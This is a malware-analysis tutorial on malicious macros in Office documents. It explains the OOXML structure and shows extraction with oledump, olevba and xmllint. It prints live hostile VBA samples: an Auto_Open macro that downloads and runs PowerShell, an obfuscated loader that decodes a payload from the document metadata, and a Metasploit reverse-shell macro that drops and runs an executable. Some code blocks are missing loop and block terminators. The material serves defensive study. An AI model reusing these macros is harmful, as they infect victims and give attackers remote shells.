Analyzing Malware Documents

Having the possibility of including code within a file allows for certain tasks to be carried out when handling documents. Whether that is to enhance the content or to process data within the document. However, having this feature has been abused by malicious actors for a long time and little can be done to mitigate this attack vector without removing the functionality from the document.

Microsoft includes the ability to embed Visual Basic for Applications code within Office documents since 1993 with the first version being implemented in Excel. Allowing the users to record actions to automate working with documents.

Visual Basic for Applications or VBA is based off of Visual Basic 6, which it's Microsoft's event-driven programming language that was discontinued back in 2008. However, the language lives on in VBA and it facilitates automating tasks within Office Documents and also in VBScripts.

Office Document Structure

In early 2000, Microsoft changed the file format from a single binary file that had a closed standard to the open standard, which utilizes XML files to make up the file. It became the default format in Office 2007.

Officially called the Office Open XML and differentiated with an x at the end of the extension, the file itself is made up of mainly XML files which are contained in a zip archive. Besides XML files, any other files that are inserted into the document are also included within the zip archive.

Within the zip archive there are some files that exist independent of the type of document, these are the Metadata files, and files that exist depending on the type of document, these are called respectively Document and are stored in a directory with the document type as the name.

The contents of the archive may differ depending on the program that created the file.

Metadata Files

There are 3 files that are used for this section

Document Properties

Located in the directory docProps, this contains two XML files that contains the properties of the document

Main Document Contents

The document contents are included in this directory and the directory name depends on the program that creates the file

The contents of this directory will vary between the format types, however, they mainly include any styling data and the distribution of the document contents.

Macros may also be included within this directory or they may exist in a separate Macros directory.


This directory includes any media, such as images, that are inserted into the document.

Malware in Macros

Malware is often embedded within Office documents and use enticing names and messages to have users open the documents and ignore any alerts.

Original versions of Office would automatically execute any macros that were included, which made it easier for malicious actors as they would only need to have the victim open the file. Due to this, Microsoft changed the way the Macros work and now it requires user intervention to start the execution of the macro, the user is alerted of the risk of running macros in unknown files.

Because of this change, malicious actors need to resort to creative measures to have the victim ignore the alert and run the macro code. Corporate environments may use macros within their documents and don't always take into consideration the employee education or signing the documents to avoid any alerts, this results in users being educated to ignore the alerts and makes it easier for the malicious actors.

There are multiple ways that the macros can be abused to attack the victim's system. There are some cases where the malware is within the code itself or it may encode a binary file that is then decoded, saved to disk, and executed.

Recent cases are using the Office document as a first stage, where PowerShell code is leveraged to download a second stage which contains the actual malware. Due to current detection mechanisms in different security tools used, the malicious actors need to encode payloads and commands with different methods which include simple encoding algorithms, such as Base64, and reversing strings or obfuscating the strings within the code.

A simple example for a first stage using macros is shown in How to create Microsoft Office macro malware – phishing attack

Sub Auto_Open()
  Dim exec As String
  exec = “powershell.exe “”IEX ((new-object net.webclient).downloadstring(‘’))”””
  Shell (exec)
End Sub

In this example, the attack is simple and is not obfuscated, the code simply downloads a file from a web server and executes it using PowerShell. The code in the PowerShell script could contain malicious intent in the way of being a second stage or even establishing a reverse shell, the possibilities are endless.

During an investigation, it would be necessary to download any additional files that the macro downloads in order to create the complete picture and look for indicators of compromise, these can be used to look for other systems that may have been infected or even establish monitoring rules to look out for new victims.

Parts of the malware can be placed within the metadata of the document, this serves as an easy hiding spot and can be quickly changed without having to go into the code to alter the payload.

Entry Point

For macro codes, there are several functions that can act as an entry point for the execution, this will depend on the intention or obfuscation method that the malicious actor may choose. It's more common for certain security applications to open email attachments for quick analysis, in order to avoid the malware from being triggered from the start, the malicious actor can use a different function that triggers the malware execution at a different point or under certain conditions.

Below is a sample obfuscated code that serves as the entry point for the malware, where the function DecodeDocument is used

Attribute VB_Name = "NewMacros"                                                   
Sub DecodeDocument()                                                                                                                                                 
Attribute DecodeDocument.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.DecodeDocument"
' DecodeDocument Macro        
    Dim d3h5dHh5U3BwaWxX
    ODppd2VGaGloc2dpSA = ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))
    a3JtdnhXZ212aXF5UmVsdHBF = aWhzZ2lI("3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE")                                
    d2hyZXFxc0doaWhzZ2lI = QmFzZTY0X0RlY29kZQo(ODppd2VGaGloc2dpSA, a3JtdnhXZ212aXF5UmVsdHBF)
    eHxpWHJtZXBU = aWhzZ2lI(d2hyZXFxc0doaWhzZ2lI)                                 
    d3h5dHh5U3BwaWxX = Shell(eHxpWHJtZXBU, vbHide)                                
End Sub                                                                           

Base64 Decode Function

The VBA implementation does not contain a function or library that can quickly encode or decode Base64, however, it can be easily implemented using other areas of Office, an example is shown with the following code

Private Function EncodeBase64(ByRef arrData() As Byte) As String

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
    ' byte array to base64
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text


    ' thanks, bye
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Private Function DecodeBase64(ByVal strData As String) As Byte()

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    ' thanks, bye
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Malicious actors may sometimes create their own implementation of certain functionality within the malware, this can be done for various reasons, one of them is because there is no simpler way to do this within the language or it could also be to obfuscate the code. It is also common for only decoders to be included within the code of the macro, specially in cases where the macro code doesn't need to encode any data.

Below is an obfuscated Base64 decoder that is found in a sample malware

Function QmFzZTY0X0RlY29kZQo(GYDozL, xbZuLutP)
    Dim VAIXQ,vgDKwiF,cWBqjCKwBl,CBnhtvROBWJf,VdNmpUUu,uOatMJ,GkdMVutOqmk,fqcaXNK,StBHym,NDXnaxDDQ,iXQiRtcgmWEUplc

    CBnhtvROBWJf = 2      
    VAIXQ = bGVuZ3RoCg(GYDozL)
    VdNmpUUu = 8
    uOatMJ = 16 * 4

    For cWBqjCKwBl = 1 To VAIXQ Step 4
        Dim zIlis,OaRRODd,WuFeJHdca,MmrJRSmq,EgnwkcNgcIgofn,dzYTBeK,xuRJndLZwLYPC,URJApvGRUMy,lpIcVNAjHiIgkw,ONOzKt,SdwnMSAxfcsNR

        zIlis = 3
        EgnwkcNgcIgofn = 0

        For OaRRODd = 0 To 3
            WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)

            If WuFeJHdca = "=" Then
                zIlis = zIlis - 1
                MmrJRSmq = 0
                MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
            End If

            EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq

        EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
        EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn

        dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))

        vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)

    QmFzZTY0X0RlY29kZQo = vgDKwiF
End Function

The function accepts two parameters:

There are also variables that are used as decoy, meaning that their values are never utilized after being assigned and this can also be done with functions, where multiple functions can be created, but never used or functions can be called but their output is never used.

Encoding is not used with security in mind, it's used with the idea of making commands not easily detectable or due to encoding conversion or when transferring data over the Internet not risking parts of the code being lost.

For this next sample code, the characters are moved over by 4 bytes, in a ROT13 style, and then the whole string is reversed.

Function aWhzZ2lI(a3JtdnhXaGloc2dySQ)
    Dim b As String, i As Long, a() As Byte, sh
    a = StrConv(a3JtdnhXaGloc2dySQ, vbFromUnicode)
    For i = 0 To UBound(a)
        a(i) = a(i) - 4
    Next i
    b = StrReverse(StrConv(a, vbUnicode))
    aWhzZ2lI = b
End Function

There is only one input parameter, which is the string that is encoded.

One way to analyze a function is to look at what parameters the functions are called with and what output they return, it is still important to look for any calls that may execute any commands outside of the code or Office document.

Renaming Functions

Given that VBA doesn't have the possibility to rename functions, like languages like JavaScript allows, a workaround is to create a function that simply returns the value that the other function returns.

In this example, to obfuscate the function Len, a function is created with a random string of characters.

Function bGVuZ3RoCg(c3RyaW5nCg)
    bGVuZ3RoCg = Len(c3RyaW5nCg)
End Function

Document Analysis

This section shows a quick analysis of a Word document. Microsoft Office documents that have a macro embedded receive an extension that ends with the letter m, though this can be changed.

The first step is to check the contents of the archive, the 7-zip utility can be used for this task

❯ 7z l Doc5.docm

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (806E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 26568 bytes (26 KiB)

Listing archive: Doc5.docm

Path = Doc5.docm
Type = zip
Physical Size = 26568

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00 .....         1585          413  [Content_Types].xml
1980-01-01 00:00:00 .....          590          239  _rels/.rels
1980-01-01 00:00:00 .....         4526         1557  word/document.xml
1980-01-01 00:00:00 .....         1081          301  word/_rels/document.xml.rels
1980-01-01 00:00:00 .....        27648        10834  word/vbaProject.bin
1980-01-01 00:00:00 .....         8393         1746  word/theme/theme1.xml
1980-01-01 00:00:00 .....          277          191  word/_rels/vbaProject.bin.rels
1980-01-01 00:00:00 .....         2474          609  word/vbaData.xml
1980-01-01 00:00:00 .....         3194         1105  word/settings.xml
1980-01-01 00:00:00 .....          241          155  customXml/item1.xml
1980-01-01 00:00:00 .....          341          225  customXml/itemProps1.xml
1980-01-01 00:00:00 .....        29364         2924  word/styles.xml
1980-01-01 00:00:00 .....          803          313  word/webSettings.xml
1980-01-01 00:00:00 .....         1567          502  word/fontTable.xml
1980-01-01 00:00:00 .....          991          572  docProps/core.xml
1980-01-01 00:00:00 .....         1041          524  docProps/app.xml
1980-01-01 00:00:00 .....          296          194  customXml/_rels/item1.xml.rels
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00              84412        22404  17 files

The fact that there is a vbaProject.bin.rels file confirms that there is a macro present within the document, this could be a red flag if there is no expectation of a macro being embedded within the document. Further analysis should be carried out in order to determine if the code is malicious or not.

Extracting Macro Source Code

There are tools that are able to extract source code from the document, such as oledump. This tool can be used to analyze the document.

❯ oledump Doc5.docm
A: word/vbaProject.bin
 A1:       412 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    7836 'VBA/NewMacros'
 A4: m    1135 'VBA/ThisDocument'
 A5:      5028 'VBA/_VBA_PROJECT'
 A6:      3195 'VBA/__SRP_0'
 A7:       340 'VBA/__SRP_1'
 A8:      3399 'VBA/__SRP_2'
 A9:       366 'VBA/__SRP_3'
A10:       348 'VBA/__SRP_4'
A11:       106 'VBA/__SRP_5'
A12:       571 'VBA/dir'

The output above shows multiple objects that are identified by the A code at the start of the line and can be easily extracted with the following command

oledump Doc5.docm -v -s A3

This would output the object A3, which is the source code of the macro that is contained within the document, this is also identified by the capital M found on the first output.

Not all macros will execute upon loading the document in an Office program, this can be done to avoid automatic analysis with sandbox tools. The function autoopen would be used for those documents that do execute the code upon opening, the following code is an example of this case

Sub autoopen()
  MsgBox ("hello world")
End Sub

After the code is extracted, it should be analyzed to determine what is useful and what can be safely discarded. Look for aspect where the code carries out possible dangerous commands and if they can be safely replaced to output to a message box or terminal, instead of executing other commands.

Tool olevba

Another tool to extract the source code is olevba, below is the sample document being analyzed with this tool

❯ olevba Doc5.docm
olevba 0.55.1 on Python 3.8.3 -
FILE: Doc5.docm
Type: OpenXML
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'.
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|Type      |Keyword             |Description                                  |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|vbHide              |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|StrReverse          |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |

An advantage of this tool is that it provides some parts of the code that are often used in malicious macro codes, which can be an initial step to determining whether the macro might be malicious or not and a starting point on what to check.

Extracting Metadata

In newer Office documents, the metadata is stored in a file called core.xml and can be viewed with the command xmllint

xmllint --format core.xml

The output is formatted and can be easily read

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="" xmlns:dc="" xmlns:dcterms="" xmlns:dcmitype="" xmlns:xsi="">
  <dc:creator>Document Author</dc:creator>
  <cp:lastModifiedBy>Document Author</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-16T00:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T00:55:00Z</dcterms:modified>

There are a couple of encoded strings visible and the macro makes reference to the metadata. Having encoded strings in the metadata can also be a red flag, these can often contain other data that the macro needs, such as having URL or IP addresses of where to download another stage. Decoding them can provide more details, though it may be possible that multiple encodings are used.

Metasploit Reverse Shell

This is a reverse shell macro that was created using Metasploit, this is a good beginner sample that can be used to practice analysis of malware documents. This section is a walkthrough of how to check this document.

First checking the file using oledump shows the following output

A: word/vbaProject.bin
 A1:       385 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    5871 'VBA/NewMacros'
 A4: m    1073 'VBA/ThisDocument'
 A5:      4400 'VBA/_VBA_PROJECT'
 A6:       734 'VBA/dir'

When extracting the content of the object A3, this is the object that is checked as it has the letter M and this is used by the oledump tool to denote macro code.

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    System ("echo """ & code & """ | python &")
End Sub

' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller,
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  '1999 Antonin Foller, Motobit Software,
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    nGroup = Hex(nGroup)
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    sOut = sOut & Left(pOut, numDataBytes)

  Base64Decode = sOut
End Function

The source code on this instance is not obfuscated, which makes it easier to analyze, and there is a check for the OS that is running so that different commands are used. There is a reference to the Comments property that is found in the metadata.

Checking the core.xml file it shows a big block of data in the description field

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="" xmlns:dc="" xmlns:dcterms="" xmlns:dcmitype="" xmlns:xsi="">
  <cp:lastModifiedBy>Wei Chen</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>

The long string is encoded using Base64, when decoding the data it results in a binary file.

Checking the Windows executable with Radare2 shows the following

❯ r2 msf.dat
[0x00407354]> i
fd       3
file     msf.dat
size     0x1204a
humansz  72.1K
mode     r-x
format   pe
iorw     false
blksz    0x0
block    0x100
type     EXEC (Executable file)
arch     x86
baddr    0x400000
binsz    73802
bintype  pe
bits     32
canary   false
retguard false
class    PE32
cmp.csum 0x000125dd
compiled Tue Apr 14 04:46:43 2009
crypto   false
dbg_file C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb
endian   little
havecode true
hdr.csum 0x00000000
guid     4AC180361
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  i386
maxopsz  16
minopsz  1
nx       false
os       windows
overlay  true
cc       cdecl
pcalign  0
pic      false
relocs   true
signed   false
sanitiz  false
static   false
stripped false
subsys   Windows GUI
va       true

The binary analysis of this is out of the scope of this documentation, however, it establishes a reverse shell back to the attacker.